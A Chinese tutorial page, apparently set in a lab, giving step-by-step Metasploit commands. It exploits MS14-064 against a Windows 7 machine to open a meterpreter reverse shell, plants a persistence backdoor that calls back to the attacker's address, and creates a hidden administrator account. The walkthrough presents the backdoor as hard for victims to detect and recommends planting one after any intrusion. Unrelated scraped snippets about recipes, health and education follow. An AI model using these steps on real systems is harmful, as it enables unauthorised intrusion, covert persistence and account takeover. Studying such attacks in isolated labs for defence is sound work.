范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

网络安全实战之植入后门程序,必看

  在 VMware 上建立两个虚拟机:win7 和 kali。
  Kali:它是 Linux 发行版的操作系统,它拥有超过 300 个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了 600 多种黑客工具,很强大。
  可以永久免费使用,基本上学黑客攻击必会用到这个系统。
  靶机:Win7 64位 (IP: 192.168.10.45)-- 用 ipconfig 进行查询。
  攻击机:Kali (IP:192.168.10.21)-- 用 ifconfig 进行查询。
  【一一帮助安全学习,所有资源获取处一一】
  ①网络安全学习路线
  ②20 份渗透测试电子书
  ③安全攻防 357 页笔记
  ④50 份安全攻防面试指南
  ⑤安全红队渗透工具包
  ⑥网络安全必备书籍
  ⑦100 个漏洞实战案例
  ⑧安全大厂内部视频资源
  ⑨历年 CTF 夺旗赛题解析1、实验环境前提条件
  win7 中,关闭防火墙("打开网络和共享中心"-"Windows 防火墙"-"打开或关闭 Windows 防火墙"-均选择关闭选项)。
  保证两个虚拟机是可以 ping 通的(尤其是在 kali 中去 ping win7,看能否连通)。$ping 192.168.10.45
  2、打开 Metasploit 渗透工具
  Metasploit 是一款开源的安全漏洞检测工具,msfconsole 用于启动 msf 终端:
  >msfconsole
  复制代码
  **结果:**成功进入,进入到"msf6>"的模式下
  3、查看需要利用的漏洞
  搜索漏洞,编号为 MS14-064。
  MS14-064 为 Windows OLE 自动化阵列远程代码执行漏洞。当 IE 不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用 IE 浏览器查看该网站时允许远程执行代码。
  【补充:Windows 系统漏洞微软的漏洞编号命名格式为:MS14-064;
  MS Micosoft 的缩写,固定格式;14 表示年份,即 2014 年发布的漏洞;064 表示顺序,即当年度发布的第 64 个漏洞。
  >search ms14-064
  复制代码
  **结果:**可以看到返回了多条可利用的漏洞模块信息
  4、尝试利用其中一个漏洞模块进行攻击
  利用其中一个漏洞攻击模块-0 模块,进行攻击,进入模块中(注意:必须是"_",不是"-",否则会报错)。
  >use exploit/windows/browser/ms14_064_ole_code_execution
  复制代码
  **结果:**成功切换到这个模块之下--"msf6 exploit(windows/browser/ms14_064_ole_code_execution)>"
  并提示"no payload configured,defaulting to windows/meterpreter/reverse_tcp"-- 没有配置 payload,默认为 windows/meterpreter/reverse_tcp
  5、查看该漏洞模块所需的参数情况
  进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。
  >show options
  复制代码
  **结果:**其中 required 显示的值为 yes 的,代表是必须要设置的项;显示的值为 no 的,代表是不必须要设置的项;
  重点关注 6 个参数配置,需要设置哪个就设置哪个:
  Payload (攻击载体-使用默认的 windows/meterpreter/reverse_tcp 即可) ;
  SRVHOST (文件共享服务器-kali 地址);
  SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);
  LHOST (发起攻击的地址-kali 地址);
  LPORT (发起攻击的端口-使用默认获取的端口即可);
  AllowPowershellPrompt (开启浏览器插件,默认为 false)
  【补充说明:
  1)Payload 中包含有需要在远程系统中运行的恶意代码,Payload 是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了 Payload 在目标系统中的行为。
  2)Payload 模块主要有以下三种类型:-Single -Stager -Stage
  Single 是一种完全独立的 Payload,实现的目的也简单,但容易被捕捉到。
  Stager 这种 Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的 Stagers Payload 就是 reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接(3 次握手-4 次挥手)(是一个基于 TCP 的反向链接反弹 shell, 使用起来很稳定)。
  Stage 是 Stager Payload 下载的一种 Payload 组件,这种 Payload 可以提供更加高级的功能,而且没有大小限制。
  3)windows/x64/meterpreter/reverse_tcp 则由一个 Stager Payload(reverse_tcp)和一个 Stage Payload(meterpreter)组成。
  注意:Payload 为 windows/meterpreter/reverse_tcp 默认获取到的控制通道 meterpreter 为 32 位,
  如果想将之后获取到的控制通道 meterpreter 改为 64 位,则设置。payload:windows/x64/meterpreter/reverse_tcp6、设置文件共享服务器
  发现 SRVHOST 为空,待设置,其它(payload/SRVPORT/LHOST/LPORT) 均已获取,且正确,设置 SRVHOST 的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?
  分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个网址,诱导用户点击了,就会直接连接到发起攻击的主机上。那你们觉得应该是谁生成这个连接呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个网站链接吧。
  所以,我们才会对这个文件共享服务器的地址设置为 kali 的地址
  >set SRVHOST 192.168.10.21
  复制代码
  7、开启浏览器插件
  要把 AllowPowershellPrompt 的默认参数 false 改为 true,因为 msf 中自带的漏洞是利用 exp 调用的是 powershell(powershell 是一种命令外壳程序和脚本环境),所以 msf 的 exp 代码只对安装了 powershell 的系统生效。
  >set AllowPowershellPrompt true
  复制代码
  8、再次进行检查
  查看对 SRVHOST 和 AllowPowershellPrompt 进行的修改,是否修改成功
  >show options
  复制代码
  9、检查无误后,发起攻击>run
  复制代码
  **结果:**生成一个网站的链接"Using URL : http://192.168.10.21:8080/xE6RxjSy ,开启服务,光标停留在这,等待有人点击该网站链接。
  10、打开网站链接
  到 win7 中,在 IE 浏览器中打开网站链接: http://192.168.10.21:8080/xE6RxjSy ,会提示是否允许打开一个文件,选择"允许"之后,即可触发会话连接。
  **结果 1:**在 win7 中打开链接后,不会有任何的反馈结果。
  **结果 2:**由于在 win7 中触发打开了网址链接,那么,在 kali 中,则会触发会话连接,结果显示了是 192.168.10.45(目标主机 win7)尝试点击了该网站链接,于是,kali 利用 MS14-064 漏洞模块对目标主机发起了攻击,最终,"meterpreter session 1 opened"-- 表明已经开通 192.168.10.21:4444 和 192.168.10.45:49191 会话连接 1。
  一般会自动进入控制通道 meterpreter,交互模式,表明攻击成功。
  注意:
  一旦开通一个会话连接后,若系统没有自动进入控制通道,则可以尝试回车,进行手动连接。
  1)手动查看当前存在的会话
  注意在目录 msf>下,手动查看当前存在的会话。
  **结果:**当前只有会话连接 1,meterpreter 建立的连接类型 type 是 x86--32 位的(由模块中的 payload 设定),以及展示目标主机 192.168.10.45 的基本信息和连接信息。
  >sessions
  复制代码
  2)选择连接当前已经开通的会话 1
  >sessions -i 1
  复制代码
  **结果:**成功进入控制通道 meterpreter,交互模式,表明攻击成功。
  11、植入后门程序
  在 kali 控制 win7 后,通过 persistence,在目标主机上生成一个后门程序,以便后续不再通过 MS14-064 漏洞进行二次入侵,而是通过这个后门文件来入侵该主机【注意在控制通道 meterpreter>下】。
  注意:因为这个 MS14-064 漏洞很容易被修复,一旦目标主机进行定期修补漏洞,那么通过 MS14-064 漏洞进行入侵的路径,就会失效,但植入的后门程序是不容易被发现和修复的,所以一旦入侵成功后,建议尝试植入后门程序。
  通过 persistence(支持多种方式启动)植入固定的后门程序,设置相关参数,设置回连地址和端口号。
  >run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21
  复制代码
  重点关注 6 个参数配置:
  -S:系统启动时自动加载本程序(因为该后门程序是不能被目标用户发现,更不需要让目标主机进行点
  击启动的,所以需要该程序有自动加载的功能);
  -U:用户登陆时自动加载本程序;
  -X:开机时自动加载本程序;
  -i: 自动加载后,回连的时间间隔,即后门每隔多少秒尝试连接回连地址;
  -r: 自动加载后,回连的主机地址,回连到谁啊,自然是入侵的 kali 的地址;
  -p:自动加载后,回连的端口号,即 kali 地址的端口号,理论上可随意设置,但范围不要超过 65535,且
  不可设置为常见的特殊的端口号;
  **结果 1:**在 kali 中提示,成功生成一个后门程序 yqLAOjt.vbs,自动加载后会回连到192.168.10.21:40000 ,并保存于目标主机 win7 中的C:Users18044AppDataLocalTemp 目录下。
  【**注意:**payload 自动设置为"windows/meterpreter/reverse_tcp" ,LHOST 设置为192.168.10.21,LPORT设置为40000 】
  **结果 2:**在 win7 中的 C:Users18044AppDataLocalTemp目录下,成功找到从攻击主机 kali 植入的后门程序 yqLAOjt.vbs
  【补充知识点:
  1)端口号范围:0~65535
  2)常见端口号列举
  12、挂起当前会话
  在成功植入后门程序后,我们还需要对该后门程序进行验证,验证是否可以通过该后门程序成功入侵目标主机 win7,所以可先将当前通过 MS14-064 漏洞开启的会话连接挂起(background)或断开(exit),均可
  meterpreter>background
  复制代码
  **结果:**成功将 session 会话 1 挂起到后台,并没有断开连接,且成功切换到 msf >目录下
  13、开启监听模块
  利用后门程序进行攻击,需要打开一个监听模块,能够反弹 shell 监听模块,进行攻击,进入模块中
  >use exploit/multi/handler
  复制代码
  **结果:**成功切换到这个模块之下--"msf6 exploit(multi/handler)>"
  并提示"Using configured payload generic/shell_reverse_tcp"-- 使用的payload为generic/shell_reverse_tcp
  14、查看该监听模块所需的参数情况
  进到这个监听模块之后,先查看该模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?
  >show options
  复制代码
  **结果:**其中 required 显示的值为 yes 的,代表是必须要设置的项;显示的值为 no 的,代表是不必须要设置的项;
  重点关注 3 个参数配置,需要设置哪个就设置哪个:
  Payload:攻击载体;
  LHOST:回连地址;
  LPORT:回连端口号;
  15、设置攻击载体、回连地址以及端口号
  因为我们要开启的这个监听模块,是专门针对于 yqLAOjt.vbs 后门程序,进行实时监听,那么,必然需要将监听模块的参数配置,与 yqLAOjt.vbs 后门程序的参数配置保持一致,只有这样,才能达到准确的监听
  之前制作 yqLAOjt.vbs 的参数为:
  "run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"
  复制代码
  因此,我们也就需要将监听模块的攻击载体 Payload,与后门程序的 payload 保持一致:
  >set payload windows/meterpreter/reverse_tcp
  复制代码
  需要将监听模块的回连地址 LHOST,与后门程序的 LHOST 保持一致:
  >set LHOST 192.168.10.21
  复制代码
  需要将监听模块的回连地址的端口号 LPORT,与后门程序的 LPORT 保持一致:
  >set LPORT 40000
  复制代码
  16、再次进行检查>show options
  复制代码
  17、检查无误后,发起攻击>run
  复制代码
  **结果:**开启针对192.168.10.21:40000 的监听模式,因为 yqLAOjt.vbs 后门程序已经设置了自动加载,所以一旦开启监听模块,立即会有反馈信息回连到192.168.10.21:40000 上来。
  最终,"meterpreter session 2 opened"-- 表明已经开通192.168.10.21:40000和192.168.10.45:49227 的会话连接 2。
  一般会自动进入控制通道 meterpreter,交互模式,表明攻击成功。
  【注意:
  此时,将当前开启的会话进行挂起操作--background,再查看当前已存在的会话--sessions,结果会得到已开启两个会话连接信息,要对这两个会话连接进行区分,分清楚,第一个会话连接是通过 MS14-064 漏洞开启的,第二个会话连接是通过后门程序开启的
  18、创建用户、设置密码
  1)拿到 shell 权限,获得控制台权限,可以获取系统的控制台C:Windowssystem32
  meterpreter>shell
  复制代码
  2)进入后,可能会有乱码的情况,解决乱码问题
  C:Windowssystem32>chcp 65001
  复制代码
  3)显示 win7 系统中所有的用户
  C:Windowssystem32>net user
  复制代码
  4)创建用户
  创建用户,用户名为 test,密码为 test【net user 用户名 密码 /add】
  C:Windowssystem32>net user test test /add
  复制代码
  也可以不设置密码,只创建用户名为 test1 的无密码用户【net user 用户名 /add】
  C:Windowssystem32>net user test1 /add
  复制代码
  **结果 1:**在 kali 中,若结果显示"the commad completed successfully" —代表"命令执行成功" ,用户创建成功 ;
  若结果显示"system error 5 has occurred;access is denied" —"发生系统错误 5; 拒绝访问"-----代表权限不够的问题,需要**进行提权,可以利用 bypassuac 或者 Windows 内核漏洞进行提权
  **结果 2:**在 win7 中,"控制面板"---"添加或删除用户账户",查看成功新建的用户 test(标准用户--密码保护)、test1(标准用户--无密码)
  5)将新用户添加到 administrator 分组--提升到管理员权限【net localgroup administrators 用户名 /add】
  C:Windowssystem32>net localgroup adminis trators test1 /add
  复制代码
  **结果 1:**在 kali 中,显示"the commad completed successfully" —代表"命令执行成功" ,成功添加到 administrator 分组,提升管理员权限成功 ;
  **结果 2:**在 win7 中,"控制面板"---"添加或删除用户账户",查看新建的用户 test1 用户由之前的"标准用户"提升至"管理员",提升权限成功。

宿迁寻亲六旬老人被救助数日,疑似名叫吴超用,高1米68受助者姓名吴超用(疑似)受助者性别男受助者年龄约65岁寻亲编号23012受助原因其它受助者特征疑似名叫吴超用,高1米68,重70公斤受助时间20230114受助地点江苏宿迁市宿豫区农村四大歪风要严打了!中央一号文件有要求,全都整治!如今农村已经有了很大的变化,许多的城里人在看到之后也无比的羡慕,每当周末或者逢年过节的时候,在农村的马路上都会堵车堵到不行,一时间,原本空荡荡的地方都会变成一个大型停车场,平时冷冷脑供血不足中医分症有效治疗头晕迷糊,严重时恶心呕吐,多年以来反反复复,真的没有什么办法吗?这篇文章就给大家分析,什么症状该怎么治疗,通过中医分症来精准治疗。导致脑供血不足的原因有很多,比如代谢综合征低血压心购买开学礼物,首选好听好看的华为FreeBuds系列耳机!在超长寒假之后,学生陆续迎来开学。开学季就要添新装备,无论是送自己还是送朋友,华为FreeBuds系列TWS耳机都可以成为首选!华为FreeBuds系列耳机在降噪音质等方面,都有领阿涅利辞去尤文主席因为我被调查,不希望俱乐部因为我背上包袱直播吧2月25日讯前尤文图斯主席阿涅利日前接受了荷兰电讯报采访,并谈到自己被禁足2年卸任尤文图斯主席一职的话题。被禁止参加足球活动2年这次处罚是意大利足协在研究了司法部的调查后对我荤素搭配,营养均衡,减脂下饭菜这样做,上桌就秒光!以前外出吃饭总会点上一盘木须肉,有肉有菜很下饭。木耳鸡蛋肉这三样食材是必备的。滑嫩的肉片,香软的鸡蛋,搭配脆滑的木耳和胡萝卜,还有清爽的黄瓜,简直不要太好吃了!家里正好还有这些食材周末家庭聚餐,八道硬菜别错过,酱汁浓郁超下饭,端上桌人人称赞大家好这里是香姐说美食,每天分享好吃的家常菜。不知不觉又一个星期即将过去,今天是星期五,也是我们上班族常说的小周末,过了这一天就到我们天天盼的周末了。忙碌了一周的上班族,在难得的周春天干饭,必备七道下饭菜,荤素搭配营养高,大人小孩都爱吃大家好这里是香姐说美食,每天分享好吃的家常菜。寒冷的冬天过去了,春天悄悄地来了,春回大地万物复苏,一派生机勃勃的景象。在欣赏春天美景的同时,别忘了春天也是一个调理身体的好季节,建议体内有结节的人,4种发物尽量少吃导语随着生活水平的不断提高,人们的健康意识越来越强,许多人已经养成了定期体检的习惯,虽然一些体检项目的价格并不便宜,但定期体检可以发现体内隐藏的症状并采取预防措施,这对预防疾病有很中国在没有引入阿拉伯数字前,古人怎么书写算式解答数学问题?汉字里表示数字的常用字有一二三四五六七八九十百千万亿兆。对应的大写分别是零壹贰叁肆伍陆柒捌玖拾佰仟萬億兆。比兆更大的数字单位有京垓秭穰沟涧正载极,不过,它们并不常用。当然,汉字里还古人的生活条件有多苦?看完你还想穿越吗?随着近几年穿越题材的影视剧小说的爆火,许多观众朋友们心中也萌生了穿越到古代,利用现代人智慧出人头地的想法。但电视剧毕竟是电视剧,总是会将更好的一面呈现给观众看。不同于科技支撑下的现
五年后本科最吃香专业有几个?你怎么看?感谢悟空小秘书的邀请!熟悉高校专业设置的朋友大概了解,目前全国大学专业多达500多个,它们存在的意义是为各行各业培养专业人才。想要从中甄选出一个就读的专业,可谓是难度不小。有的人侧陕西有哪些专业性高校?陕西省高等教育实力排在全国第二梯队,与江苏省湖北省并驾齐驱。全国的高校大体上分为综合性高校和专业性高校,那么在陕西省的这些高校中有哪些是专业性高校?都有哪些特色专业呢?下面我们就来一个学校副高级教师再往上评的可能性有多大?一个学校的教师已评上副高级教师的,再往上评正高级,可能性有多大?小徐老师从教20年,辗转到过多地各个教师岗位,20年来,我所任职过的学校,至今没有任何一个中小学教师能评上正高级职称浙江大学真的是靠把浙江高校优势资源全部合并后才挤入华东五校的吗?我想说说合并前的浙江大学到底是个怎么样的学校,是不是像喷子们说的浙江大学是在四校合并后才膨胀起来。我们暂且不说民国的四大名校有浙大,也不说竺可桢摔浙大历尽坎坷西迁贵州办学,也不说被对于中学生早恋现象怎么解决?题主没有讲明是家长层面,还是老师层面,不过教育是想通的,可以相互借鉴,我侧重谈老师层面。首先,不要过于把早恋夸大化,放大化,不要觉得早恋就像洪水猛兽一样谈恋色变。其实,孩子处在青春消除身体结节最好方法是什么?这年头,谁去体个检,都基本上能查出个结节来!有人可能会说陈医生有点夸大其词,我给大家罗列几个大家常见的结节的发病率,大家就不会这样认为了!第一个,像我们的甲状腺结节。40岁的人去查火灾现场的死者具有什么样的特征,多久时间会被烧焦?首先感谢邀请回答。我是个法医,就是出非正常死亡现场以及检验尸体的法医,法医研究生毕业以来一直从事法医工作,也见过很多火场里面的遗体,这个我来回答一下吧。题目火灾现场的死者具有什么样一级建造师备考多长时间通过几率大?这个要具体问题具体分析了,针对不同的人群要有不同的学习时间和方法才行,大致可以分为以下几类第一种对于零基础的考生时间安排零基础的考生如果想一次性通过全科考试还是有难度,不建议一次性长时间贴双眼皮贴,眼皮会松弛吗?该怎么办?长期贴双眼皮,眼皮会松弛吗?该怎么办?长期贴双眼皮,眼皮一定会松弛的,建议去整形医院做一个双眼皮。现在做双眼皮是一个非常小的手术,恢复期过了,非常漂亮,而且持久。双眼皮贴长期使用的肖战经历被黑后为啥还这么火呢,小飞侠对他的爱能维持多长时间呢?日本茶道讲究一期一会,说的是一生只能体验一次的际遇和情感,正所谓难得一面,世当珍惜肖战正是很多人的一期一会。题主理解不了这样的感情,只是因为没有这样的好运气遇到属于ta的一期一会罢小姐姐们有什么好用的身体乳推荐吗?皮肤是身体的大器官,是保护身体不受细菌入侵的第一防线,不注意身体护理会带来很多隐患干燥起皮皮肤瘙痒细纹加深粗糙暗黄背部痘痘为了更好地保养我们的肌肤,我们就可以使用身体乳。给你推荐一